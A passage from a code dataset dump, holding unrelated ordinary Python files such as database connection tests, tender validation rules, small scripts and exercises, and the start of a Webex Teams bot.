amazon.lookup(ItemId='B01J4MF53Q')\nprint(product.reviews[1])\nprint(product.large_image_url)\n\n","sub_path":"media/uploads/2019/12/11/lll.py","file_name":"lll.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438224284","text":"# !/usr/bin/python3\n\nimport sys\n\ngene = sys.argv[1]\ndata = sys.argv[2]\n\nwith open(data, \"r\") as handles1, open(gene, \"r\") as handles2:\n l_book = [] \n for line1 in handles1:\n word = line1.strip().split(\"\\t\")\n for i in word:\n l_book.append(i)\n\n d_book = {}\n for j in range(0,len(l_book), 2):\n d_book[l_book[j]] = l_book[j+1]\n\n mylist = handles2.read().splitlines()\n for line2 in mylist :\n if line2 in d_book:\n print(line2 + \"\\t\" + d_book[line2])\n elif line2 not in d_book:\n print(line2 + \"\\t\" +\"NA\")\n","sub_path":"q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"492577030","text":"\"\"\"\n:Copyright: 2006-2019 Jochen Kupperschmidt\n:License: Modified BSD, see LICENSE for details.\n\"\"\"\n\nfrom byceps.services.orga import service as orga_service\n\nfrom tests.helpers import create_brand, create_user\n\n\ndef test_flag_changes(admin_app_with_db):\n brand = create_brand()\n\n user = create_user()\n admin = create_user('Admin')\n\n assert not orga_service.is_user_orga(user.id)\n\n flag = orga_service.add_orga_flag(brand.id, user.id, admin.id)\n\n assert orga_service.is_user_orga(user.id)\n\n orga_service.remove_orga_flag(flag, admin.id)\n\n assert not orga_service.is_user_orga(user.id)\n","sub_path":"tests/services/orga/test_service.py","file_name":"test_service.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363950746","text":"from scipy.stats import multivariate_normal\nimport matplotlib.pyplot as plt\n\nplt.xkcd()\n\nfig, ax = plt.subplots(1, 1, figsize=(8, 7))\n\nplt.grid(color='lightgray', linestyle='-', linewidth=0.5)\n\n# Random scatter of preferences\nrv = multivariate_normal.rvs(mean=(0.5, 0.2),\n cov=((0.25, 0.1),\n (0.1, 0.25)),\n size=80)\nax.scatter(rv[:, 0], rv[:, 1], c='darkgray', zorder=2)\n\n# Total preference decision line\nax.plot([1, -1], [-1, 1], ':', color='navy')\n\n# Labels etc.\nax.set(xlabel='Enjoyment of lunch delivery',\n ylabel=\"Enjoyment of co-workers' company\",\n xlim=(-1, 1), ylim=(-1, 1),\n xticks=[0], yticks=[0],\n xticklabels=[], yticklabels=[],\n title='Do you like free lunch?')\n\nax.text(-0.8, -0.2, \"There's no such thing!\", color='firebrick')\nax.text(0.4, 0.8, 'Sign me up!', color='navy')\n\nfig.set_tight_layout(True)\n\nplt.show()\n","sub_path":"do_you_like_free_lunch.py","file_name":"do_you_like_free_lunch.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121238372","text":"class Node:\n def __init__(self, v):\n self.v = v\n self.children = []\n\n\ndef readRelationData(fileName):\n relations = []\n with open(fileName) as f:\n # Read parent - child relations\n for line in f:\n rowData = line.split()\n p = int(rowData[0])\n c = int(rowData[1])\n relations.append((p, c))\n f.close()\n\n return relations\n\n\ndef reconstruct(relations):\n pareChildMap = {}\n root = None\n # Find root order and parent - children set\n for r in relations:\n p, c = r\n if p == c:\n # Init root node seperately\n root = Node(p)\n else:\n if p in pareChildMap:\n pareChildMap[p].append(c)\n else:\n pareChildMap[p] = [c]\n\n print(pareChildMap)\n # Do DFS\n stack = [root]\n while stack:\n node = stack.pop()\n pid = node.v\n if pid in pareChildMap:\n cValues = pareChildMap[pid]\n for cv in cValues:\n cNode = Node(cv)\n node.children.append(cNode)\n stack.append(cNode)\n\n return root\n\n\ndef printTree(root: Node):\n # BFS\n queue = [(root, 0)]\n preDepth = 0\n while queue:\n node, depth = queue.pop(0)\n if depth > preDepth:\n print('')\n\n print(node.v, end=' ')\n preDepth = depth\n for c in node.children:\n queue.append((c, depth + 1))\n\n print('')\n\n\nrelations = readRelationData('parentChildRelations')\ntree = reconstruct(relations)\nprintTree(tree)","sub_path":"Py_solution/consTreeWithChildParentRelation.py","file_name":"consTreeWithChildParentRelation.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"241111572","text":"import multiprocessing\nimport threading\n\nimport mock\nimport pytest\nfrom ZODB.POSException import ConflictError\n\nimport sheraf\nimport tests\n\n\nclass Model(tests.UUIDAutoModel):\n field = sheraf.SimpleAttribute()\n\n\ndef test_connection(sheraf_database):\n sheraf_database.connection = mock.Mock(side_effect=sheraf_database.connection)\n\n with sheraf.connection(commit=True):\n sheraf_database.connection.assert_called_with(\n commit=True,\n cache_minimize=False,\n reuse=False,\n _trackeback_shift=2,\n )\n m = Model.create(field=\"foo\")\n\n @sheraf.connection()\n def read(mid):\n m = Model.read(mid)\n assert \"foo\" == m.field\n\n read(m.id)\n sheraf_database.connection.assert_called_with(\n commit=False,\n cache_minimize=False,\n reuse=False,\n _trackeback_shift=2,\n )\n\n @sheraf.connection(commit=True, cache_minimize=True)\n def update(mid):\n m = Model.read(mid)\n assert \"foo\" == m.field\n m.field = \"bar\"\n\n update(m.id)\n sheraf_database.connection.assert_called_with(\n commit=True,\n cache_minimize=True,\n reuse=False,\n _trackeback_shift=2,\n )\n\n with sheraf.connection():\n sheraf_database.connection.assert_called_with(\n commit=False,\n cache_minimize=False,\n reuse=False,\n _trackeback_shift=2,\n )\n\n m = Model.read(m.id)\n assert \"bar\" == m.field\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_current_connection(cacheMinimize, sheraf_database):\n assert sheraf.Database.current_connection() is None\n assert sheraf.Database.current_name() is None\n\n with sheraf.connection() as conn:\n assert sheraf.Database.current_connection() is conn\n assert sheraf.Database.DEFAULT_DATABASE_NAME == sheraf.Database.current_name()\n\n assert sheraf.Database.current_connection() is None\n assert sheraf.Database.current_name() is None\n\n with sheraf.connection() as conn:\n assert sheraf.Database.current_connection() is conn\n assert sheraf.Database.DEFAULT_DATABASE_NAME == sheraf.Database.current_name()\n\n assert sheraf.Database.current_connection() is None\n assert sheraf.Database.current_name() is None\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_without_args(cacheMinimize, sheraf_database):\n with sheraf.connection(commit=True):\n m = Model.create()\n\n with sheraf.connection():\n m.field = \"yeah\"\n\n with sheraf.connection():\n m = Model.read(m.id)\n assert not m.field\n assert not cacheMinimize.called\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_without_args_and_with_exception(cacheMinimize, sheraf_database):\n with sheraf.connection(commit=True):\n m = Model.create()\n\n try:\n with sheraf.connection():\n m.field = \"yeah\"\n raise ValueError()\n except ValueError:\n pass\n\n with sheraf.connection():\n m = Model.read(m.id)\n assert not m.field\n assert not cacheMinimize.called\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_with_commit(cacheMinimize, sheraf_database):\n with sheraf.connection(commit=True):\n m = Model.create()\n\n with sheraf.connection(commit=True):\n m.field = \"yeah\"\n\n with sheraf.connection():\n m = Model.read(m.id)\n assert \"yeah\" == m.field\n assert not cacheMinimize.called\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_with_commit_and_exception(cacheMinimize, sheraf_database):\n with sheraf.connection(commit=True):\n m = Model.create()\n\n try:\n with sheraf.connection(commit=True):\n m.field = \"yeah\"\n raise ValueError()\n except ValueError:\n pass\n\n with sheraf.connection():\n m = Model.read(m.id)\n assert not m.field\n assert not cacheMinimize.called\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_with_cache_minimize(cacheMinimize, sheraf_database):\n with sheraf.connection(cache_minimize=True):\n pass\n\n assert cacheMinimize.called\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_with_cache_minimize_and_exception(cacheMinimize, sheraf_database):\n try:\n with sheraf.connection(cache_minimize=True):\n raise ValueError()\n except ValueError:\n pass\n\n assert cacheMinimize.called\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_with_database_name(cacheMinimize, sheraf_database, other_database):\n assert sheraf.Database.get(\"other_database\") != sheraf.Database.get()\n with sheraf.connection(commit=True) as c:\n c.root()[\"data\"] = True\n with sheraf.connection(database_name=\"other_database\") as c:\n assert \"data\" not in c.root()\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_nested_connections_raise_exception(cacheMinimize, sheraf_database):\n with sheraf.connection():\n with pytest.raises(sheraf.exceptions.ConnectionAlreadyOpened):\n with sheraf.connection():\n pass # pragma: no cover\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_nested_connections_raise_exception_message(cacheMinimize, sheraf_database):\n with sheraf.connection():\n with pytest.raises(\n sheraf.exceptions.ConnectionAlreadyOpened,\n match=\"First connection was .* on .*{} at line\".format(__file__),\n ):\n with sheraf.connection():\n pass # pragma: no cover\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_nested_connections_on_two_databases_raise_exception(\n cacheMinimize, sheraf_database\n):\n other = sheraf.Database(\"memory://?database_name=other_database\")\n with sheraf.connection():\n with pytest.raises(sheraf.exceptions.ConnectionAlreadyOpened):\n with sheraf.connection(database_name=\"other_database\"):\n pass # pragma: no cover\n other.close()\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_connection_closed_in_connection_context(cacheMinimize, sheraf_database):\n with sheraf.connection() as connection:\n connection.close()\n\n class CustomException(Exception):\n pass\n\n with pytest.raises(CustomException):\n with sheraf.connection(commit=True) as connection:\n connection.close()\n raise CustomException()\n\n\n@mock.patch(\"ZODB.Connection.Connection.cacheMinimize\")\ndef test_database_context_manager(cacheMinimize):\n db = sheraf.Database()\n with db.connection() as connection:\n assert sheraf.Database.current_connection() is connection\n db.close()\n\n\ndef test_multithreading_database_connection(sheraf_zeo_database):\n with sheraf.connection(commit=True) as c:\n c.root.list = sheraf.types.LargeList()\n c.root.list.append(\"main\")\n\n class MyThread(threading.Thread):\n def run(self):\n with sheraf.connection(commit=True) as c:\n c.root.list.append(\"thread\")\n\n my_thread = MyThread()\n my_thread.start()\n my_thread.join(timeout=10)\n\n with sheraf.connection() as c:\n assert [\"main\", \"thread\"] == list(c.root.list)\n\n\ndef test_multiprocessing_database_connection(sheraf_zeo_database):\n with sheraf.connection(commit=True) as c:\n c.root.list = sheraf.types.LargeList()\n c.root.list.append(\"main\")\n\n class MyProcess(multiprocessing.Process):\n def __init__(self, uri):\n super().__init__()\n self.uri = uri\n\n def run(self):\n with pytest.raises(KeyError):\n sheraf.Database.get()\n\n db = sheraf.Database(self.uri)\n with sheraf.connection(commit=True) as conn:\n conn.root.list.append(\"process\")\n db.close()\n\n my_process = MyProcess(sheraf_zeo_database.uri)\n my_process.start()\n my_process.join(timeout=10)\n assert 0 == my_process.exitcode\n\n with sheraf.connection() as c:\n assert [\"main\", \"process\"] == list(c.root.list)\n\n\ndef test_data_reading(sheraf_database):\n sheraf_database.nestable = True\n\n with sheraf.connection(commit=True) as c:\n c.root()[\"data\"] = True\n\n with sheraf.connection() as c1:\n assert c1.root()[\"data\"]\n\n with sheraf.connection(commit=True) as c2:\n c2.root()[\"data\"] = False\n\n assert c1.root()[\"data\"]\n\n with sheraf.connection() as c3:\n assert not c3.root()[\"data\"]\n\n\ndef test_transaction_managers(sheraf_database):\n sheraf_database.nestable = True\n\n with sheraf.connection() as c1:\n with sheraf.connection() as c2:\n assert c1.transaction_manager != c2.transaction_manager\n\n\ndef test_conflict(sheraf_database):\n sheraf_database.nestable = True\n\n with sheraf.connection(commit=True) as c:\n c.root()[\"data\"] = sheraf.types.SmallList()\n\n with pytest.raises(ConflictError):\n with sheraf.connection(commit=True) as c1:\n c1.root()[\"data\"].append(\"connection1\")\n\n with sheraf.connection(commit=True) as c2:\n c2.root()[\"data\"].append(\"connection2\")\n\n\ndef test_get_current_connection_nested(sheraf_database, other_nested_database):\n sheraf_database.nestable = True\n\n with sheraf.connection(sheraf.Database.DEFAULT_DATABASE_NAME) as conn_default:\n assert sheraf.Database.DEFAULT_DATABASE_NAME == sheraf.Database.current_name()\n assert conn_default == sheraf.Database.current_connection()\n\n with sheraf.connection(\"other_nested_database\") as conn_other:\n assert \"other_nested_database\" == sheraf.Database.current_name()\n assert conn_other == sheraf.Database.current_connection()\n\n assert sheraf.Database.DEFAULT_DATABASE_NAME == sheraf.Database.current_name()\n assert conn_default == sheraf.Database.current_connection()\n\n\ndef test_last_connection(sheraf_database):\n with sheraf.connection() as conn:\n assert conn == sheraf.Database.last_connection(sheraf_database)\n\n\ndef test_replace(sheraf_database):\n with sheraf.connection() as conn1:\n with sheraf.connection(reuse=True) as conn2:\n assert conn1 is conn2\n","sub_path":"tests/databases/test_connection.py","file_name":"test_connection.py","file_ext":"py","file_size_in_byte":10263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"652945384","text":"# https://adventofcode.com/2020/day/25\n\nimport itertools\n\nfrom helpers import nth\n\nTEST = [5764801, 17807724]\n\nINPUT = [17607508, 15065270]\n\ndef transformed_values(subject):\n val = 1\n while True:\n yield val\n val = (val * subject) % 20201227\n\ndef transform(subject, loop_size):\n return nth(transformed_values(subject), loop_size)\n\ndef find_loop_size(pubkey):\n for loop_size, val in enumerate(transformed_values(7)):\n if val == pubkey:\n return loop_size\n\ndef test_find_loop_size():\n assert find_loop_size(5764801) == 8\n assert find_loop_size(17807724) == 11\n\ndef part1(*keys):\n loop1 = find_loop_size(keys[0])\n loop2 = find_loop_size(keys[1])\n ekey1 = transform(keys[0], loop2)\n ekey2 = transform(keys[1], loop1)\n assert ekey1 == ekey2\n return ekey1\n\ndef test_part1():\n assert part1(*TEST) == 14897079\n\nif __name__ == \"__main__\":\n ans = part1(*INPUT)\n print(f\"Part 1: {ans}\")\n","sub_path":"day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20187735","text":"from cs1robots import *\r\n#load_world(\"worlds/hurdles1.wld\")\r\nload_world(\"worlds/hurdles2.wld\")\r\n#load_world(\"worlds/hurdles3.wld\")\r\n\r\nhubo = Robot()\r\n\r\nhubo.set_trace(\"blue\")\r\nhubo.set_pause(.2)\r\n\r\ndef turn_right():\r\n for i in range(3):\r\n hubo.turn_left() \r\n\r\ndef move_or_jump():\r\n while hubo.front_is_clear():\r\n hubo.move()\r\n if not hubo.front_is_clear():\r\n hubo_jump()\r\n\r\ndef hubo_jump():\r\n if not hubo.on_beeper():\r\n hubo.turn_left()\r\n hubo.move()\r\n turn_right()\r\n hubo.move()\r\n turn_right()\r\n hubo.move()\r\n hubo.turn_left()\r\n else:\r\n hubo.set_pause()\r\n\r\nwhile not hubo.on_beeper():\r\n move_or_jump()\r\n\r\n\r\n##def turn_right():\r\n## for i in range(3):\r\n## hubo.turn_left() \r\n##\r\n###hubo will curb right\r\n##def hubo_turn_right():\r\n## if not hubo.on_beeper():\r\n## hubo.drop_beeper()\r\n## turn_right()\r\n## hubo.move()\r\n## turn_right()\r\n##\r\n###hubo will curb left\r\n##def hubo_turn_left():\r\n## if not hubo.on_beeper():\r\n## hubo.drop_beeper()\r\n## hubo.turn_left()\r\n## hubo.move()\r\n## hubo.turn_left()\r\n##\r\n###hubo will pick beeper and move forward\r\n##def forward():\r\n## while hubo.front_is_clear():\r\n## if not hubo.on_beeper():\r\n## hubo.drop_beeper()\r\n## else:\r\n## hubo.move()\r\n##\r\n##while hubo.front_is_clear:\r\n## while hubo.left_is_clear: #modulize two lines together\r\n## forward()\r\n## hubo_turn_left()\r\n## forward()\r\n## hubo_turn_right()\r\n## if not hubo.left_is_clear(): #hubo will stop when reaching top\r\n## hubo.set_pause()\r\n","sub_path":"Week2/Hw2_p3.py","file_name":"Hw2_p3.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"13271407","text":"#!/usr/bin/python\nfrom datetime import date\nfrom math import radians as rad,degrees as deg\n\nimport ephem\n\ng = ephem.Observer()\ng.name='Somewhere'\ng.lat=rad(47.35) # lat/long in decimal degrees\ng.long=rad(7.94)\n\nm = ephem.Moon()\n\ng.date = date.today()# local time zone, I'm in UTC+1\ng.date -= ephem.hour # always everything in UTC\n\nfor i in range(24*4): # compute position for every 15 minutes\n m.compute(g)\n\n nnm = ephem.next_new_moon(g.date)\n pnm = ephem.previous_new_moon(g.date)\n # for use w. moon_phases.ttf A -> just past newmoon,\n # Z just before newmoon\n # '0' is full, '1' is new\n # note that we cannot use m.phase as this is the percentage of the moon\n # that is illuminated which is not the same as the phase!\n lunation=(g.date-pnm)/(nnm-pnm)\n symbol=lunation*26\n if symbol < 0.2 or symbol > 25.8 :\n symbol = '1' # new moon\n else:\n symbol = chr(ord('A')+int(symbol+0.5)-1)\n\n print(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\") % (ephem.localtime(g.date).time().strftime(\"%H:%M:%S\"), deg(m.alt),deg(m.az),\n ephem.localtime(g.date).time().strftime(\"%H%M\"),\n m.phase,symbol)\n g.date += ephem.minute*15\n","sub_path":"moon.py","file_name":"moon.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374733472","text":"from datetime import timedelta\n\nfrom schematics.exceptions import ValidationError\n\nfrom openprocurement.api.constants import RELEASE_2020_04_19, WORKING_DAYS\nfrom openprocurement.api.validation import (\n validate_data,\n validate_json_data,\n OPERATIONS,\n _validate_accreditation_level,\n _validate_accreditation_level_mode,\n validate_tender_first_revision_date,\n)\nfrom openprocurement.api.utils import (\n error_handler,\n get_now,\n raise_operation_error,\n update_logging_context,\n upload_objects_documents,\n)\nfrom openprocurement.tender.core.utils import calculate_tender_business_date, calculate_tender_date\nfrom openprocurement.tender.open.constants import POST_SUBMIT_TIME\n\n\ndef _validate_tender_period_start_date(data, period, working_days=False, calendar=WORKING_DAYS):\n min_allowed_date = calculate_tender_date(\n get_now(),\n - timedelta(minutes=10),\n tender=None,\n working_days=working_days,\n calendar=calendar\n )\n if min_allowed_date >= period.startDate:\n raise ValidationError(\"tenderPeriod.startDate should be in greater than current date\")\n\n\n# complaint\ndef validate_submit_claim_time(request, **kwargs):\n tender = request.validated[\"tender\"]\n claim_submit_time = request.content_configurator.tender_claim_submit_time\n claim_end_date = calculate_tender_business_date(tender.tenderPeriod.endDate, -claim_submit_time, tender)\n if get_now() > claim_end_date:\n raise_operation_error(\n request,\n \"Can submit claim not later than {duration.days} \"\n \"full calendar days before tenderPeriod ends\".format(\n duration=claim_submit_time\n )\n )\n\n\ndef validate_update_claim_time(request, **kwargs):\n tender = request.validated[\"tender\"]\n if get_now() > tender.enquiryPeriod.clarificationsUntil:\n raise_operation_error(request, \"Can update claim only before enquiryPeriod.clarificationsUntil\")\n\n\n# complaint documents\ndef validate_complaint_document_operation_not_in_allowed_status(request, **kwargs):\n if request.validated[\"tender_status\"] not in [\"active.tendering\"]:\n raise_operation_error(\n request,\n \"Can't {} document in current ({}) tender status\".format(\n OPERATIONS.get(request.method), request.validated[\"tender_status\"]\n ),\n )\n\n\n# contract\ndef validate_contract_update_with_accepted_complaint(request, **kwargs):\n tender = request.validated[\"tender\"]\n if any(\n [\n any([c.status == \"accepted\" for c in i.complaints])\n for i in tender.awards\n if i.lotID in [a.lotID for a in tender.awards if a.id == request.context.awardID]\n ]\n ):\n raise_operation_error(request, \"Can't update contract with accepted complaint\")\n\n\ndef validate_accepted_complaints(request, **kwargs):\n if any(\n [\n any([c.status == \"accepted\" for c in i.complaints])\n for i in request.validated[\"tender\"].awards\n if i.lotID == request.validated[\"award\"].lotID\n ]\n ):\n operation = OPERATIONS.get(request.method)\n raise_operation_error(request, \"Can't {} document with accepted complaint\".format(operation))\n\n\n# cancellation\ndef validate_not_only_unsuccessful_awards_or_qualifications(request, **kwargs):\n unsuccessful_statuses = {\"unsuccessful\", \"cancelled\"}\n tender = request.validated[\"tender\"]\n cancellation = request.validated[\"cancellation\"]\n # we use below getattr, so we can use validator bot for openua and openeu procedures\n items = tender.awards if tender.awards else getattr(tender, \"qualifications\", \"\")\n\n def raise_error():\n raise_operation_error(\n request,\n \"Can't perform cancellation if all {} are unsuccessful\".format(\n \"awards\" if tender.awards else \"qualifications\"\n ),\n )\n\n if not cancellation.relatedLot and tender.lots:\n # cancelling tender with lots\n # can't cancel tender if there is a lot, where\n active_lots = (i.id for i in tender.lots if i.status == \"active\")\n for lot_id in active_lots:\n item_statuses = {i.status for i in items if i.lotID == lot_id}\n if item_statuses and not item_statuses.difference(unsuccessful_statuses):\n raise_error()\n\n elif cancellation.relatedLot and tender.lots or not cancellation.relatedLot and not tender.lots:\n # cancelling lot or tender without lots\n statuses = {i.status for i in items if i.lotID == cancellation.relatedLot}\n if statuses and not statuses.difference(unsuccessful_statuses):\n raise_error()\n\n\n# post\ndef _validate_post_accreditation_level(request, **kwargs):\n tender = request.validated[\"tender\"]\n mode = tender.get(\"mode\", None)\n _validate_accreditation_level(request, tender.edit_accreditations, \"post\", \"creation\")\n _validate_accreditation_level_mode(request, mode, \"post\", \"creation\")\n\n\ndef validate_complaint_post_data(request, **kwargs):\n update_logging_context(request, {\"post_id\": \"__new__\"})\n _validate_post_accreditation_level(request)\n model = type(request.context).posts.model_class\n post = validate_data(request, model)\n upload_objects_documents(\n request, request.validated[\"post\"],\n route_kwargs={\"post_id\": request.validated[\"post\"].id}\n )\n return post\n\n\ndef validate_award_complaint_post_data(request, **kwargs):\n update_logging_context(request, {\"post_id\": \"__new__\"})\n _validate_post_accreditation_level(request)\n model = type(request.context).posts.model_class\n post = validate_data(request, model)\n upload_objects_documents(\n request, request.validated[\"post\"],\n route_kwargs={\"post_id\": request.validated[\"post\"].id}\n )\n return post\n\n\ndef validate_cancellation_complaint_post_data(request, **kwargs):\n update_logging_context(request, {\"post_id\": \"__new__\"})\n _validate_post_accreditation_level(request)\n model = type(request.tender).cancellations.model_class.complaints.model_class.posts.model_class\n post = validate_data(request, model)\n upload_objects_documents(\n request, request.validated[\"post\"],\n route_kwargs={\"post_id\": request.validated[\"post\"].id}\n )\n return post\n\n\ndef validate_qualification_complaint_post_data(request, **kwargs):\n update_logging_context(request, {\"post_id\": \"__new__\"})\n _validate_post_accreditation_level(request)\n model = type(request.context).posts.model_class\n post = validate_data(request, model)\n upload_objects_documents(\n request, request.validated[\"post\"],\n route_kwargs={\"post_id\": request.validated[\"post\"].id}\n )\n return post\n\n\ndef validate_complaint_post_complaint_type(request, **kwargs):\n complaint = request.validated[\"complaint\"]\n if complaint.type != \"complaint\":\n raise_operation_error(\n request, \"Can't submit or edit post in current ({}) complaint type\".format(\n complaint.type\n )\n )\n\n\ndef validate_complaint_post_complaint_status(request, **kwargs):\n complaint = request.validated[\"complaint\"]\n if complaint.status not in [\"pending\", \"accepted\"]:\n raise_operation_error(\n request, \"Can't submit or edit post in current ({}) complaint status\".format(\n complaint.status\n )\n )\n\n\ndef validate_complaint_post_review_date(request, calendar=WORKING_DAYS, **kwargs):\n complaint = request.validated[\"complaint\"]\n if complaint.status == \"accepted\":\n tender = request.validated[\"tender\"]\n post_end_date = calculate_tender_business_date(\n complaint.reviewDate, -POST_SUBMIT_TIME,\n tender=tender, working_days=True, calendar=calendar\n )\n if get_now() > post_end_date:\n raise_operation_error(\n request,\n \"Can submit or edit post not later than {duration.days} \"\n \"full business days before reviewDate\".format(\n duration=POST_SUBMIT_TIME\n )\n )\n\n\ndef validate_complaint_post_document_upload_by_author(request, **kwargs):\n if request.authenticated_role != request.context.author:\n request.errors.add(\"url\", \"role\", \"Can add document only by post author\")\n request.errors.status = 403\n raise error_handler(request)\n\n\ndef validate_complaint_post(request, **kwargs):\n validate_tender_first_revision_date(request, validation_date=RELEASE_2020_04_19)\n","sub_path":"src/openprocurement/tender/open/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":8553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95485378","text":"\"\"\"test pour voir l'apport de la vectorisation pour la fonction affectation\"\"\"\n\nfrom hmeans import *\nimport numpy as np\nfrom time import time\n\nnp.random.seed(7)\nC = np.array([[-1,0],\n [1,0],\n [0,1],\n [0,-1]])\nsigma_K = [3, 4, 5, 4.5]\nn_K = [15000, 11000, 7000, 8000]\n\nX = fabrique_donnees(C, sigma_K, n_K)\n\nt0 = time()\nclasse, I = affectation(X, C)\ntscal = time() - t0\nt0 = time()\nG = barycentrage(X, classe, 4)\ntbscal = time() - t0\n\nt0 = time()\nclasse_ref, I_ref = affectationv(X, C)\ntvec = time() - t0\nt0 = time()\nG_ref = barycentragev(X, classe_ref, 4)\ntbvec = time() - t0\n\nif np.all(classe == classe_ref) and np.allclose(I, I_ref) and np.allclose(G, G_ref):\n print(\" justesse : OK\")\nelse:\n print(\" justesse : pas OK\")\n \n\nprint(f' temps scalaire affectation = {tscal}')\nprint(f' temps vectoriel affectation = {tvec}')\nprint(f' scal/vec affectation= {tscal/tvec}')\n\nprint(f' temps scalaire barycentrage = {tbscal}')\nprint(f' temps vectoriel barycentrage = {tbvec}')\nprint(f' scal/vec barycentrage= {tbscal/tbvec}')\n\n\n","sub_path":"S6/MN/Cours/src/TP3/apport_vectorisation.py","file_name":"apport_vectorisation.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526252814","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"A simple bot script, built on Flask.\nThis sample script leverages the Flask web service micro-framework\n(see http://flask.pocoo.org/). By default the web server will be reachable at\nport 5000 you can change this default if desired (see `flask_app.run(...)`).\nngrok (https://ngrok.com/) can be used to tunnel traffic back to your server\nif your machine sits behind a firewall.\nYou must create a Webex Teams webhook that points to the URL where this script\nis hosted. You can do this via the WebexTeamsAPI.webhooks.create() method.\nAdditional Webex Teams webhook details can be found here:\nhttps://developer.webex.com/webhooks-explained.html\nA bot must be created and pointed to this server in the My Apps section of\nhttps://developer.webex.com. The bot's Access Token should be added as a\n'WEBEX_TEAMS_ACCESS_TOKEN' environment variable on the web server hosting this\nscript.\nThis script supports Python versions 2 and 3.\nCopyright (c) 2016-2018 Cisco and/or its affiliates.\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\n# Use future for Python v2 and v3 compatibility\nfrom __future__ import (\n absolute_import,\n division,\n print_function,\n unicode_literals,\n)\nfrom builtins import *\n\nfrom flask import Flask, request\nimport requests\nimport yaml\nimport os\nimport logging\nfrom typing import Dict, Any\n\nfrom scripts import setinitial\nfrom scripts import PSQL\nfrom scripts.tasker import Person, All_persons, Tasker\n\n\n# Initializing logger\nsetinitial.setup_logging()\n# create logger\nlogger = logging.getLogger(__name__)\n\n\n\nfrom webexteamssdk import WebexTeamsAPI, Webhook, Message, Room\n\n\nconfig = {} # create dictionary for config\ntry:\n config = setinitial.setup_config() # populate config from yaml file\nexcept yaml.YAMLError as exc:\n logger.fatal(\"Error in yaml file: \" + str(exc))\n exit(2)\nexcept IOError as exc:\n logger.fatal(\"IOError:\" + str(exc))\n exit(2)\n\n# Initialize the environment\n# Create the web application instance\nflask_app = Flask(__name__)\n# Create the Webex Teams API connection object\napi = WebexTeamsAPI( access_token=config['bot_access_token'])\n\n\n# Helper functions\n\ndef create_webhook_obj(request_json: str) -> Webhook:\n # Get the POST data sent from Webex Teams\n json_data = request_json\n logger.info(\"WEBHOOK POST RECEIVED:\")\n logger.info(json_data)\n\n # Create a Webhook object from the JSON data\n\n return Webhook(json_data)\n\ndef process_message(api: WebexTeamsAPI, message:Message, room:Room) -> str:\n try:\n psql_obj = PSQL.PSQL('ciscolive', config[\"db_host\"],\n config[\"db_login\"], config[\"db_password\"])\n except IndexError:\n logger.fatal(f'Can\\'t connect to Database:{config[\"db_login\"]}@{config[\"db_host\"]}/ciscolive')\n exit(2)\n\n logger.info(f'Connected to DB:{config[\"db_login\"]}@{config[\"db_host\"]}/ciscolive')\n\n\n try:\n if len(message.files) > 0:\n\n logger.error(\"Found attachment in user's input. Notifiying him that attachments are not supported\")\n\n 